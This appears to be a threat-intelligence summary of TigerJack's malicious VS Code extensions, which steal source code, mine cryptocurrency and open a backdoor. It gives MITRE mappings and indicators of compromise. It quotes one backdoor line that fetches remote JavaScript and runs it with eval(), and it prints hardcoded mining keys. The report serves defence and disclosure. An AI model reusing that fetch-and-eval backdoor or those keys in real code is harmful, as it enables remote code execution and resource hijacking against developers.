TigerJack is a threat actor who published at least 11 malicious VS Code extensions across multiple publisher accounts that steal C++ source code, mine cryptocurrency, and provide a remote backdoor for full system control; two extensions alone—”C++ Playground” and “HTTP Format”—infected over 17,000 developers before removal from Microsoft’s marketplace but remain active on OpenVSX. The operation uses deceptive, fully functional tools, staged clean releases, coordinated republication, and centralized command-and-control endpoints to persist and scale its campaign. #TigerJack #C++Playground #HTTPFormat #ab498.pythonanywhere.com #CoinIMP
Keypoints
- TigerJack published at least 11 malicious VS Code extensions across three publisher accounts (ab-498, 498, 498-00), using professional-looking tooling to gain trust and installs.
- The “C++ Playground” extension exfiltrated complete C++ source files in real time by listening to document change events and posting JSON payloads to remote endpoints (e.g., ab498.pythonanywhere.com).
- The “HTTP Format” extension performed covert cryptocurrency mining via hardcoded CoinIMP credentials and API endpoints, significantly raising CPU usage on infected machines.
- Multiple extensions (498.cppplayground, 498.httpformat, 498.pythonformat) contained identical backdoor code that fetched and eval()’d remote JavaScript every 20 minutes, enabling arbitrary remote code execution.
- TigerJack used a trojan-horse strategy by first publishing benign extensions to build reputation before pushing malicious updates; when removed from VS Code, many extensions persisted on OpenVSX and were republished under new accounts.
- Microsoft quietly removed some extensions after thousands were compromised but provided no user notifications, leaving developers unaware and vulnerable; alternative marketplaces lack equivalent detection controls.
- Koi proposes continuous, cross-marketplace scanning and automatic remediation to detect and remove malicious extensions before they impact development environments.
MITRE Techniques
- [T1059 ] Command and Scripting Interpreter – The backdoor periodically fetches and executes JavaScript from a remote server using eval(): “let remoteCode = await ( await fetch(‘https://ab498.pythonanywhere.com/static/in4.js’) ).text(); if (remoteCode != previousCode) { eval(remoteCode); }”
- [T1071 ] Application Layer Protocol – Malicious extensions exfiltrate code and communicate with C2 over HTTPS endpoints such as “https://ab498.pythonanywhere.com/test4” and “https://api.codex.jaagrav.in” to send JSON payloads containing source code.
- [T1020 ] Automated Exfiltration – The “C++ Playground” registers a document change listener and transmits captured C++ source code automatically after short delays: “Every keystroke triggers this function after a 500-millisecond delay… Your complete source code gets packaged into JSON payloads and transmitted to multiple endpoints.”
- [T1496 ] Resource Hijacking – The “HTTP Format” extension embedded CoinIMP mining credentials and used API endpoints to mine cryptocurrency on infected hosts, increasing CPU usage and degrading performance: “Secret crypto mining by the extension increases the computer’s CPU usage.”
- [T1078 ] Valid Accounts (Implied) – Use of legitimate extension marketplace accounts and staged clean releases to establish trust and persist installations (trojan-horse strategy) by publishing benign versions before malicious updates.
Indicators of Compromise
- [Domain ] C2 and service endpoints – ab498.pythonanywhere[.]com, api.codex.jaagrav[.]in
- [Domain ] Cryptocurrency mining service – coinimp[.]com (used with hardcoded Site Key and API Key shown in article)
- [Extension Names ] Malicious/republished VS Code extensions – ab-498.cppplayground, ab-498.httpformat, ab-498.pythonformat, 498.cppplayground, 498.httpformat, 498.pythonformat, 498-00.cppplayground, 498-00.cppformat, 498-00.pythonformat, 498-00.testwebext, ab-498.cppformat
- [Hardcoded Credentials ] CoinIMP mining keys in extension code – Site Key: 53415facb13dccbdf8523b5eefd45d01f6b16bf984cd8cf39ac04150266a4cd9, API Key: a8cf5c9291594c471bb786dcadeb9845bc3cc26a17ec52ec632a9bb7844e5b87
Read more: https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code